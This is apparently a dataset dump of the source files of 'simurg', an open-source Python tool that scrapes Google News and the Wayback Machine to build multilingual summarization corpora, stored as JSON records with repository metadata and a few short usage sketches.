WebDriverWait(driver, 25).until(EC.presence_of_element_located((By.XPATH, r\"/html/body/div[3]/div[5]/div[3]/div[1]/ul[1]/li[1]/div/div/a/div/img\")))\n content = driver.find_elements_by_class_name(\"mimg\")\n image = choice(content).get_attribute(\"src\")\n driver.close()\n return [image, str(time()-ts)+\" s\"]\n"
}
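A usage sketch for `getitem` above (assumes Chrome and a matching chromedriver are installed, the `GOOGLE_CHROME_BIN` environment variable points at the Chrome binary as the function expects, and network access to bing.com is available):

```python
# Returns [image_url, runtime_string]; each call performs a live Bing image search.
img_url, runtime = getitem("grumpy cat")
print(img_url)
print(runtime)  # e.g. "12.3 s"
```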
] | 2 |
pasmod/simurg | https://github.com/pasmod/simurg | e9fe185bb4ddb1dfe35d3459b89891a168a8fb4b | 9fe84fb300810ab7f703385c2dd1e5e7afa712f9 | 925ccdf93bb69ad3160057cc04cd0457a4def0e6 | refs/heads/master | 2021-04-12T03:42:26.815547 | 2017-03-28T08:05:04 | 2017-03-28T08:05:04 | 53,422,442 | 5 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.5589905381202698,
"alphanum_fraction": 0.5640378594398499,
"avg_line_length": 26.807018280029297,
"blob_id": "c68721753f0d84902bfecf8dd7f8619082be4893",
"content_id": "ec893ff3ea09ea6f606edfe3bd904bdfda9c84df",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1585,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 57,
"path": "/simurg/clients/redis_client.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "import logging\nimport config\nimport redis\nimport os\n\n\nclass RedisClient():\n def __init__(self, lang='de'):\n self.redis = redis.StrictRedis(\n host=os.environ['DB_PORT_6379_TCP_ADDR'],\n port=os.environ['DB_PORT_6379_TCP_PORT'],\n db=config.REDIS_DBS[lang])\n self.lang = lang\n\n def insert(self, news):\n \"\"\"Insert a news object into database\n\n # Arguments\n news: news object to be inserted\n \"\"\"\n key = news['url']\n self.redis.hset(key, 'id', news['id'])\n self.redis.hset(key, 'url', news['url'])\n self.redis.hset(key, 'wayback_url', news['wayback_url'])\n self.redis.hset(key, 'headline_selector', news['headline_selector'])\n self.redis.hset(key, 'timestamp', news['timestamp'])\n logging.info('inserted news with url: {}'.format(news['url']))\n\n def exists(self, key):\n \"\"\"Check if the key exists in the database\n\n # Arguments\n key: key to be checked\n\n # Returns\n exists: True if the key exists in the database\n \"\"\"\n return self.redis.exists(key)\n\n def keys(self):\n \"\"\"Returns all keys in the database\n\n # Returns\n keys: all keys in the database\n \"\"\"\n return self.redis.keys()\n\n def get(self, key):\n \"\"\"Returns the values of a given keys as dictionary\n\n # Arguments\n key: key to be retrieved\n\n # Returns\n dictionary: value of the keys in form of a dictionary\n \"\"\"\n return self.redis.hgetall(key)\n"
},
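A small usage sketch for `RedisClient` above (assumes a Redis server is reachable and that the two `DB_PORT_6379_TCP_*` environment variables the constructor reads are set; the news values are made-up samples):

```python
import os
# Normally injected by Docker links; pointed at a local Redis here for the demo.
os.environ.setdefault('DB_PORT_6379_TCP_ADDR', 'localhost')
os.environ.setdefault('DB_PORT_6379_TCP_PORT', '6379')
from simurg.clients.redis_client import RedisClient

client = RedisClient(lang='de')
news = {'id': '42', 'url': 'http://example.com/story', 'wayback_url': 'None',
        'headline_selector': 'h1.headline', 'timestamp': '2017-03-01T12:00:00'}
client.insert(news)
print(client.exists('http://example.com/story'))  # True
print(client.get('http://example.com/story'))     # all stored hash fields
```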
{
"alpha_fraction": 0.7426573634147644,
"alphanum_fraction": 0.7454545497894287,
"avg_line_length": 28.79166603088379,
"blob_id": "87369d45a4ba39339f4598ac97ef4cea10ada013",
"content_id": "1a3bf27e8d01df2ac0f161be49730c2d67e51f33",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 715,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 24,
"path": "/simurg/__init__.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "from logger.logstash_formatter import LogstashFormatterV2\nfrom simurg import create_template_corpus # noqa\nfrom simurg import populate_template_corpus # noqa\nimport logging\n\n\ndef config_logger(log_level=logging.INFO):\n \"\"\"Configures the logger\n \"\"\"\n logger = logging.getLogger()\n logger.setLevel(log_level)\n\n # Disables the logs from the requests library\n requests_log = logging.getLogger(\"requests\")\n requests_log.addHandler(logging.NullHandler())\n requests_log.propagate = False\n\n # Sets formatter to the logstash formatter\n handler = logging.StreamHandler()\n formatter = LogstashFormatterV2()\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\nconfig_logger()\n"
},
{
"alpha_fraction": 0.617521345615387,
"alphanum_fraction": 0.617521345615387,
"avg_line_length": 21.285715103149414,
"blob_id": "b7f61f003dfb3ff86d7644b05627d2614219b3b0",
"content_id": "ef847ffe6b0aa77f5ea9cdb167da7bf47768aa2c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 468,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 21,
"path": "/simurg/util.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "import logging\n\n\ndef is_valid(news, field=None):\n \"\"\"Checks fields in a news object for validity. If a field does not exist,\n or its value is not defined, return False.\n\n # Arguments\n news: a news dictionary object\n field: field to be checked for validity\n\n # Returns:\n valid: returns true if field is valid\n \"\"\"\n try:\n news[field]\n except:\n return False\n if news[field]:\n return True\n return False\n"
},
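The three cases `is_valid` above distinguishes, shown on a made-up news dict:

```python
news = {'html': '<html></html>', 'headline': ''}
print(is_valid(news, field='html'))      # True: field exists and is truthy
print(is_valid(news, field='headline'))  # False: field exists but is empty
print(is_valid(news, field='body'))      # False: field is missing entirely
```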
{
"alpha_fraction": 0.6102719306945801,
"alphanum_fraction": 0.6116817593574524,
"avg_line_length": 30.42405128479004,
"blob_id": "5001d627dfd032c8ff2bb3de5f1e8d5b8383f37e",
"content_id": "f0a795d4f019be6474001694a8ffe66fb5b7b7dd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4965,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 158,
"path": "/simurg/scrapper/template.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "from selector_finder import find_selector\nfrom dragnet import content_extractor\nfrom collections import OrderedDict\nfrom unidecode import unidecode\nfrom bs4 import BeautifulSoup\nfrom simurg.clients.fetcher import fetch\nfrom simurg.util import is_valid\nimport logging\nimport os.path\nimport time\nimport re\n\n\ndef clean_soup(soup):\n \"\"\"Removes some elements that may negatively affect the\n quality of headline extraction\n\n # Arguments\n soup: parsed html document\n \"\"\"\n exclude_tags = ['style', 'script', '[document]', 'head', 'title']\n [s.extract() for s in soup(exclude_tags)]\n\n\ndef find_headline_element(soup, headline):\n \"\"\"Finds the headline element on a page based on a headline hint.\n\n # Argument\n soup: parsed html page\n headline: headline hint to be used\n\n # Returns\n el: headline element (None if not found)\n \"\"\"\n clean_soup(soup)\n # headline sometimes contains \"...\" at the end. We eliminate it.\n headline = headline[:-4]\n if ':' in headline:\n headline = headline.split(':')[1]\n elems = soup(text=re.compile(re.escape(headline)))\n d = {}\n for el in elems:\n d[el.parent] = el.parent.text.strip()\n headline_elems = sorted(d, key=lambda k: len(d[k]))\n if len(headline_elems) > 0:\n return headline_elems\n logging.debug('Headline \"{}\" not found'.format(unidecode(headline)))\n return None\n\n\ndef append_html(news, redis_client):\n \"\"\"Appends an html field to the news, only if the wayback_url is valid and\n the url does not already exist in the database.\n\n # Arguments\n news: news object as dictionary\n\n # Returns\n news: news object with or without html field\n \"\"\"\n if is_valid(news, field='wayback_url'):\n fetch_url = news['wayback_url']\n else:\n fetch_url = news['url']\n if not redis_client.exists(news['url']):\n news['html'] = fetch(fetch_url)\n return news\n logging.info('Skipping duplicate url: {}'.format(news['url']))\n return news\n\n\ndef append_headline_selector(news):\n \"\"\"Appends the headline css selector field to the news, only if the html\n field exists and is valid.\n\n # Arguments\n news: news object as dictionary\n\n # Returns\n news: news object with or without headline css selector field\n \"\"\"\n if is_valid(news, field='html'):\n soup = BeautifulSoup(news['html'], 'html.parser')\n headline_elems = find_headline_element(soup, news['headline'])\n if headline_elems:\n news['headline_selector'] = find_selector(soup, headline_elems)\n return news\n logging.debug('Headline css selector could not be found!')\n else:\n logging.debug('Fetching html page failed. 
url={}'.\n format(news['url']))\n return news\n\n\ndef get_base_url(lang='de'):\n \"\"\"Return the google news url for a specific language\n\n # Arguments\n lang: required language for google news\n\n # Returns\n url: corresponding google news url for the given language\n \"\"\"\n if lang == 'de':\n return 'http://news.google.com/news?ned=de'\n if lang == 'en':\n return 'http://news.google.com/news?ned=us'\n if lang == 'fr':\n return 'https://news.google.com/news?ned=fr'\n if lang == 'it':\n return 'https://news.google.com/news?ned=it'\n else:\n raise ValueError('unsupported language {}'.format(lang))\n\n\ndef populate(redis_client):\n \"\"\"Populates the entries in the database with fields such as headline,\n body, html and url\n\n # Arguments\n lang: language of the database\n\n # Returns\n news: news objects populated with required fields\n \"\"\"\n keys = redis_client.keys()\n folder = 'docs/{}/'.format(redis_client.lang)\n for key in keys:\n value = redis_client.get(key)\n f = folder + value['id'] + '.json'\n if os.path.isfile(f):\n logging.info('Skipping existing document: {}'.format(f))\n continue\n if value['wayback_url'] == 'None':\n html = fetch(value['url'])\n else:\n html = fetch(value['wayback_url'])\n time.sleep(1)\n if html:\n soup = BeautifulSoup(html, 'html.parser')\n else:\n continue\n headline_elems = soup.select(value['headline_selector'], None)\n if len(headline_elems) > 0:\n headline = headline_elems[0].text.strip()\n else:\n logging.debug('Headline can not be refound: url={}, selector={}'\n .format(value['url'], value['headline_selector']))\n continue\n news = OrderedDict()\n news['id'] = value['id']\n news['timestamp'] = value['timestamp']\n news['lang'] = redis_client.lang\n news['url'] = value['url']\n news['wayback_url'] = value['wayback_url']\n news['headline'] = headline.strip()\n news['body'] = content_extractor.analyze(html).strip()\n yield news\n"
},
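A self-contained sketch of `find_headline_element` from `template.py` above on a toy page (the hint carries the trailing "..." that the function trims off, mirroring the Google News snippets it was written for; assumes the function is in scope):

```python
from bs4 import BeautifulSoup

html = '<html><head><title>t</title></head><body><h1>Merkel besucht Paris</h1></body></html>'
soup = BeautifulSoup(html, 'html.parser')
elems = find_headline_element(soup, 'Merkel besucht Paris...')
print(elems[0].name)  # 'h1': the smallest element whose text contains the headline
```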
{
"alpha_fraction": 0.7685233950614929,
"alphanum_fraction": 0.7724645137786865,
"avg_line_length": 51.136985778808594,
"blob_id": "3c2cb247cdf959c6beb74c267051716a8e66c7e0",
"content_id": "1674cb301a9317392e14744fe41abe8fde8f65ac",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3806,
"license_type": "permissive",
"max_line_length": 821,
"num_lines": 73,
"path": "/README.md",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "# Simurg\n\n[](https://travis-ci.org/pasmod/simurg)\n[](https://github.com/pasmod/simurg/blob/master/License.md)\n\nA tool to create extendable multilingual corpora for abstractive text summarization (and other applications).\n## Motivation\nAbstractive single document summarization is considered as a difficult problem in the field of artificial intelligence and natural language processing. Meanwhile and specifically in the last two years, several deep learning summarization approaches were introduced that once again attracted the attention of researchers to this field.\n\nIt is a known issue that deep learning approaches do not work well with small amount of data. With some exceptions, this is unfortunately the case for most of the data sets available for the summarization task. Beside this problem, it should be considered that phonetic, morphological, semantic and syntactic features of the language are constantly changing over time and unfortunately most of the summarization corpora are constructed from old resources. Another problem is the language of the corpora. Not only in the summarization field, but also in other fields of natural language processing, most of the corpora are only available in English. In addition to the above problems, licence terms and fees of the corpora is a obstacle that prevent many academics and specifically non-academics from accessing these data.\n\nSimurg is an open source framework to create an extensable multilingual corpus for abstractive single document summarization that addresses the above mentioned problems.\n\n## Architecture\nCreating the corpus consists of two phases:\n- Constructing the template corpus: The template corpus is the sharable part of the Simurg corpus.\n\n<img src=\"https://github.com/pasmod/simurg/blob/master/images/architecture.jpg\" width=\"300\", align=\"middle\">\n- Populating the template corpus: In this phase the template corpus will be populated with all the required information and the result will be a collection of JSON documents.\n\n## Dependencies\n- [Docker](https://www.docker.com/)\n\n## Setup the Project\n- ```make build```: to build the docker image\n- ```make start_redis```: to start the redis server\n- ```make connect_redis```: to use the redis command line interface\n- ```make run```: to run the container\n\n## Template Corpus\nTo create the template corpus use the following commands:\n\n```make run```: to run the container\n\nIn the container run ```python``` and then enter the following two python commands:\n\n```python\nimport simurg\nsimurg.create_template_corpus(lang='de')\n```\n\n## Populating the Template Corpus\nRun the following command to create the final corpus:\n\n```make run```: to run the container\n\nIn the container run ```python``` and then enter the following two python commands:\n```python\nimport simurg\nsimurg.populate_template_corpus(lang='de')\n```\n\n## Adding New Languages:\nCurrently English, German, French and Italian are supported. Adding a new language is simple:\nIn the file ```config.py``` modify the variable ```REDIS_DBS``` and add the new language code. Example to add Farsi:\n```python\nREDIS_DB = {\n 'de': 0,\n 'en': 1,\n 'fr': 2,\n 'it': 3,\n 'tr': 4\n}\n```\n\n## Parallel Execution\nIf you want to construct a corpur for multiple languages at the same time, simply start several containers at the same time. 
For example to construct English, German, French and Italian corpus at the same time run the following commands:\n```bash\nmake run # For the first language\ndocker exec -it simurg bash -l # For the second language\ndocker exec -it simurg bash -l # For the third language\ndocker exec -it simurg bash -l # For the fourth language\n```\n"
},
{
"alpha_fraction": 0.6861110925674438,
"alphanum_fraction": 0.6888889074325562,
"avg_line_length": 28.032258987426758,
"blob_id": "f189092c529a8c87d4fe1de58b0fee5e986e5fca",
"content_id": "bfee9c4e2502ea8cbf9f9a31acf2979004702a2c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1800,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 62,
"path": "/simurg/scrapper/scrapper.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\nfrom urlparse import urljoin\nimport selectors\nimport urllib2\nimport logging\n\n\ndef get_story_urls(base_url, selector=selectors.TOP_STORY_LINK_SELECTOR):\n \"\"\"Returns all top story urls on the base google news page\n\n # Arguments\n base_url: base google news url\n selector: css selector to select the top story urls\n\n # Returns\n urls: list of stop story urls\n \"\"\"\n response = urllib2.urlopen(base_url)\n soup = BeautifulSoup(response.read(), 'html.parser')\n hrefs = [el.get('href') for el in soup.select(selector)]\n urls = [urljoin(base_url, href) for href in hrefs]\n logging.info('Discovered {} stories on {}'.format(len(urls), base_url))\n return urls\n\n\ndef get_news_elements(soup, selector=selectors.NEWS_ELEMENT_SELECTOR):\n \"\"\"Returns all news section elements from a top story page\n\n # Arguments\n soup: parsed top story page\n selector: css selector to select news sections\n\n # Returns\n els: news section elements\n \"\"\"\n return soup.select(selector)\n\n\ndef get_news_link(news_element, selector=selectors.NEWS_LINK_SELECTOR):\n \"\"\"Returns the news link inside a news section\n\n # Arguments\n news_element: element corresponding to a news section\n selector: css selector to select the news link\n\n # Returns\n el: news link element\n \"\"\"\n return news_element.select(selector)[0]\n\n\ndef get_news_headline(news_element, selector=selectors.HEADLINE_SELECTOR):\n \"\"\"Returns the headline of a news section element\n\n # Arguments\n news_element: element corresponding to a news section\n selector: css selector to select news headline\n\n # Returns\n el: element containing the news headline\n \"\"\"\n return news_element.select(selector)[0]\n"
},
{
"alpha_fraction": 0.7587131261825562,
"alphanum_fraction": 0.7667560577392578,
"avg_line_length": 32.90909194946289,
"blob_id": "d0504af6fc9986d3d1569136742047fc5b0dab96",
"content_id": "0634f0e43d95506e6a5e135e8922acc9266d86a1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 373,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 11,
"path": "/simurg/scrapper/selectors.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "# Main page consists of 10 top stories\nTOP_STORY_LINK_SELECTOR = 'div.topic a'\n\n# Each top story consists of news sections\nNEWS_ELEMENT_SELECTOR = 'div.blended-wrapper.esc-wrapper'\n\n# Each news section contains a link to the news\nNEWS_LINK_SELECTOR = 'h2.esc-lead-article-title a'\n\n# Each news section contains the headline of the news\nHEADLINE_SELECTOR = 'span.titletext'\n"
},
{
"alpha_fraction": 0.6021634340286255,
"alphanum_fraction": 0.6048678159713745,
"avg_line_length": 25,
"blob_id": "4c67dc455d3b5435fb1b66107da741d6610a0e50",
"content_id": "2140462b0316dbd029244e0e32ff55d18b20dfd5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3328,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 128,
"path": "/simurg/scrapper/selector_finder.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "import logging\n\n\ndef find_selector(soup, elems):\n \"\"\"Given a parsed html document, find a css selector for the given element.\n\n # Arguments\n soup: parsed html document\n el: html element for which a css selector has to be found\n\n # Returns\n selector: a css selector (or None if nothing found)\n \"\"\"\n css_selectors = [class_css_selector,\n id_css_selector,\n attribute_css_selector,\n type_css_selector]\n for selector in css_selectors:\n for el in elems:\n css_selector = selector(el)\n if valid(soup, css_selector) and \\\n unique(soup, css_selector) and \\\n match(soup, css_selector, el):\n return css_selector\n return None\n\n\ndef id_css_selector(el):\n \"\"\"Tries to construct a css selector of the form el#id from the element\n\n # Argument\n el: an html element\n\n # Returns\n selector: css selector of the form el#id\n \"\"\"\n css_id = el.get('id', None)\n if css_id and len(css_id[0].strip()) > 0:\n return '{}#{}'.format(el.name, css_id[0])\n return None\n\n\ndef class_css_selector(el):\n \"\"\"Tries to construct a css selector of the form el.class from the element\n\n # Argument\n el: an html element\n\n # Returns\n selector: css selector of the form el.class\n \"\"\"\n css_class = el.get('class', None)\n if css_class and len(css_class[0].strip()) > 0:\n return '{}.{}'.format(el.name, css_class[0])\n return None\n\n\ndef attribute_css_selector(el, attribute='itemprop'):\n \"\"\"Tries to construct a css selector of the form el[attribute=value]\n from the element\n\n # Argument\n el: an html element\n attribute: css attribute\n\n # Returns\n selector: css selector of the form el.class\n \"\"\"\n value = el.attrs.get(attribute, None)\n if value and len(value.strip()) > 0:\n return '{}[{}={}]'.format(el.name, attribute, value)\n return None\n\n\ndef type_css_selector(el):\n \"\"\"Tries to construct a css selector of the form el from the element\n\n # Argument\n el: an html element\n\n # Returns\n selector: css selector of the form el\n \"\"\"\n if el.name:\n return '{}'.format(el.name)\n return None\n\n\ndef unique(soup, css_selector):\n \"\"\"Checks if selecting the css selector returns a unique element.\n\n # Arguments\n soup: parsed html document\n css_selector: css selector to be tested\n\n # Returns\n unique: True if a unique element is returned\n \"\"\"\n return len(list(soup.select(css_selector))) == 1\n\n\ndef valid(soup, css_selector):\n \"\"\"Checks if the css selector is valid.\n\n # Arguments\n soup: parsed html document\n css_selector: css selector for which the validity has to be checked\n\n # Returns\n valid: True if css slector is valid\n \"\"\"\n try:\n soup.select(css_selector)\n return True\n except:\n return False\n\n\ndef match(soup, css_selector, el):\n \"\"\"Checks if the selected element by the css selector matches\n the given element.\n\n # Arguments\n soup: parsed html document\n css_selector: css selector that returns an element\n el: html element to be matched with\n \"\"\"\n return soup.select(css_selector)[0] == el\n"
},
{
"alpha_fraction": 0.5966851115226746,
"alphanum_fraction": 0.600368320941925,
"avg_line_length": 20.719999313354492,
"blob_id": "a59317f8958fb8252a0d24d3a0ee6e14cf926bf7",
"content_id": "92c56577e62b85176bbc807107d61858a8995fbc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 543,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 25,
"path": "/simurg/clients/fetcher.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "import logging\nimport httplib2\n\n\nh = httplib2.Http(\".cache\")\n\n\ndef fetch(url):\n \"\"\"Downloads a URL.\n Args:\n url: The URL.\n max_attempts: Max attempts for downloading the URL.\n timeout: Connection timeout in seconds for each attempt.\n Returns:\n The HTML at the URL or None if the request failed.\n \"\"\"\n if not url:\n return None\n\n try:\n (_, content) = h.request(url, \"GET\")\n return content\n except:\n logging.debug('Fetching url failed: {}'.format(url))\n return None\n"
},
{
"alpha_fraction": 0.5665770769119263,
"alphanum_fraction": 0.5697532296180725,
"avg_line_length": 31.22834587097168,
"blob_id": "a516166dbb3533ae75e2a0c8ace848504fad019a",
"content_id": "d9ed823b8b24983b8219bd40a9bdb750d5a93a79",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4093,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 127,
"path": "/simurg/logger/logstash_formatter.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "'''\nThis library is provided to allow standard python\nlogging to output log data as JSON formatted strings\nready to be shipped out to logstash.\n'''\nimport logging\nimport socket\nimport datetime\nimport traceback as tb\nimport json\n\n\ndef _default_json_default(obj):\n \"\"\"\n Coerce everything to strings.\n All objects representing time get output as ISO8601.\n \"\"\"\n if isinstance(obj, (datetime.datetime, datetime.date, datetime.time)):\n return obj.isoformat()\n else:\n return str(obj)\n\n\nclass LogstashFormatter(logging.Formatter):\n \"\"\"\n A custom formatter to prepare logs to be\n shipped out to logstash.\n \"\"\"\n\n def __init__(self,\n fmt=None,\n datefmt=None,\n json_cls=None,\n json_default=_default_json_default):\n \"\"\"\n :param fmt: Config as a JSON string, allowed fields;\n extra: provide extra fields always present in logs\n source_host: override source host name\n :param datefmt: Date format to use (required by logging.Formatter\n interface but not used)\n :param json_cls: JSON encoder to forward to json.dumps\n :param json_default: Default JSON representation for unknown types,\n by default coerce everything to a string\n \"\"\"\n\n if fmt is not None:\n self._fmt = json.loads(fmt)\n else:\n self._fmt = {}\n self.json_default = json_default\n self.json_cls = json_cls\n if 'extra' not in self._fmt:\n self.defaults = {}\n else:\n self.defaults = self._fmt['extra']\n if 'source_host' in self._fmt:\n self.source_host = self._fmt['source_host']\n else:\n try:\n self.source_host = socket.gethostname()\n except:\n self.source_host = \"\"\n\n\nclass LogstashFormatterV2(LogstashFormatter):\n \"\"\"\n A custom formatter to prepare logs to be\n shipped out to logstash V1 format.\n \"\"\"\n\n def _make_timestamp(self, now):\n sft = now.strftime(\"%Y-%m-%dT%H:%M:%S\")\n millis = \".%03dZ\" % (now.microsecond / 1000)\n return sft + millis\n\n def _drop_some(self, fields):\n for field in ['args', 'created', 'filename', 'funcName', 'levelno',\n 'lineno', 'module', 'msecs', 'pathname', 'process',\n 'processName', 'relativeCreated', 'source_host',\n 'stack_info', 'thread', 'threadName']:\n fields.pop(field, None)\n\n def _filter_severity(self, fields):\n severity = fields.pop('levelname').lower()\n if 'warning' == severity:\n severity = 'warn'\n elif 'critical' == severity:\n severity = 'fatal'\n fields['severity'] = severity\n\n def _filter_message(self, fields):\n fields['message'] = fields.pop('msg', None)\n\n if type(fields['message']) is dict:\n params = fields.pop('message')\n fields['message'] = params.pop('message', None)\n fields['params'] = params\n\n def _filter_exception(self, fields):\n if 'exc_info' in fields:\n if fields['exc_info']:\n formatted = tb.format_exception(*fields['exc_info'])\n fields['exception'] = formatted\n fields.pop('exc_info')\n\n if 'exc_text' in fields and not fields['exc_text']:\n fields.pop('exc_text')\n\n def format(self, record):\n \"\"\"\n Format a log record to JSON, if the message is a dict\n assume an empty message and use the dict as additional\n fields.\n \"\"\"\n\n fields = record.__dict__.copy()\n self._drop_some(fields)\n self._filter_severity(fields)\n self._filter_message(fields)\n self._filter_exception(fields)\n fields['@timestamp'] = self._make_timestamp(datetime.datetime.utcnow())\n fields['@version'] = 1\n\n logr = self.defaults.copy()\n logr.update(fields)\n\n return json.dumps(logr, default=self.json_default, cls=self.json_cls)\n"
},
{
"alpha_fraction": 0.6480541229248047,
"alphanum_fraction": 0.6615905165672302,
"avg_line_length": 24.69565200805664,
"blob_id": "d8ee7d6eccd502f329f9f92ca537ca1df246b54c",
"content_id": "6d86c4416d31eff48cc339e41748374feddff2c5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 591,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 23,
"path": "/Makefile",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "name = simurg\nregistry = pasmod\n\nbuild:\n\tdocker build -t $(registry)/$(name) $(BUILD_OPTS) .\n\nstop:\n\tdocker rm -f $(name) || true\n\nrun: stop\n\tdocker run -it --rm=true -v $(shell pwd):/var/www --link redis:db --name=$(name) $(registry)/$(name) bash -l\n\nstart: stop\n\tdocker run -d -v $(shell pwd):/var/www --name=$(name) $(registry)/$(name)\n\nstart_redis: stop_redis\n\tdocker run --name redis -v $(shell pwd)/redis:/data -d redis redis-server --appendonly yes\n\nstop_redis:\n\tdocker rm -f redis || true\n\nconnect_redis:\n\tdocker run -it --link redis:redis --rm redis redis-cli -h redis -p 6379:6379\n"
},
{
"alpha_fraction": 0.6184130907058716,
"alphanum_fraction": 0.6196244955062866,
"avg_line_length": 29.574073791503906,
"blob_id": "3b61dfea6256e51b7a83271798ca877061a8fd1a",
"content_id": "720bd36310004b76701e25f23b23db61234c1989",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1651,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 54,
"path": "/simurg/scrapper/wayback.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "import requests\nimport logging\nimport re\n\n\nwayback_pattern = re.compile(r'web/([^/]*)/')\n\n\ndef get_wayback_url(url):\n \"\"\"Retrieves the URL for the latest historic copy using Wayback Machine.\n Args:\n urls: The URL for a specific page (canonical URL + forwarding URL's).\n max_attempts: The maximum attempts at requesting the URL.\n Returns:\n The URL or None if no copy is stored for the URL.\n Raises:\n RuntimeError: Failed to retrieve the URL.\n \"\"\"\n logging.debug('Retrieving wayback url for url: {}'.format(url))\n\n if not url:\n return None\n\n index_collection_url = 'http://archive.org/wayback/available'\n\n payload = {'url': url}\n\n try:\n entry_req = requests.get(index_collection_url, params=payload,\n allow_redirects=False)\n\n if entry_req.status_code != requests.codes.ok:\n logging.debug('Failed retrieving url for: {}'.format(url))\n return None\n\n entry = entry_req.json()\n\n if 'closest' not in entry['archived_snapshots']:\n logging.debug('Failed retrieving url for: {}'.format(url))\n return None\n\n wayback_url = entry['archived_snapshots']['closest']['url']\n wayback_url = wayback_pattern.sub(r'web/\\g<1>id_/', wayback_url, 1)\n logging.debug('Success in retrieving the wayback url for: {}'.\n format(url))\n\n return wayback_url\n\n except requests.exceptions.ConnectionError:\n logging.debug('Failed retrieving url for: {}'.format(url))\n return None\n\n logging.debug('Failed retrieving url for: {}'.format(url))\n return None\n"
},
{
"alpha_fraction": 0.6223490834236145,
"alphanum_fraction": 0.6239804029464722,
"avg_line_length": 30.435897827148438,
"blob_id": "b7b720a71398b875f75107de625a36ae0e0736df",
"content_id": "43dde1b2ca35a775d8c711337b64f1231fe2f53c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1226,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 39,
"path": "/simurg/scrapper/news_builder.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "from wayback import get_wayback_url\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nfrom simurg.clients.fetcher import fetch\nfrom simurg.scrapper import scrapper\nimport logging\nimport uuid\n\n\ndef build_news(url):\n \"\"\"Constructs the first version of a news that hat to be completed later.\n A news consists of the following fields:\n id, headline, url, wayback_url\n\n # Arguments\n url: top story page that contains the news\n\n # Returns\n news: a news dictionary objects\n \"\"\"\n try:\n html = fetch(url)\n except StandardError:\n logging.debug('Error fetching story page {}'.format(url))\n html = None\n\n if html:\n soup = BeautifulSoup(html, 'html.parser')\n news_elements = scrapper.get_news_elements(soup)\n for news_el in news_elements:\n news = {}\n news['id'] = unicode(uuid.uuid4())\n news['headline'] = scrapper.get_news_headline(news_el).text\n news['url'] = scrapper.get_news_link(news_el).get('href')\n news['wayback_url'] = get_wayback_url(news['url'])\n news['timestamp'] = datetime.now().strftime('%Y-%m-%dT%H:%M:%S')\n yield news\n else:\n yield None\n"
},
{
"alpha_fraction": 0.7524430155754089,
"alphanum_fraction": 0.7703583240509033,
"avg_line_length": 25.69565200805664,
"blob_id": "5b9837f150ad7c58eafd02ea43d43a33b9cb2465",
"content_id": "c2ab385f6b18f9e2d7c86c6579306b169c9919f9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 614,
"license_type": "permissive",
"max_line_length": 136,
"num_lines": 23,
"path": "/Dockerfile",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
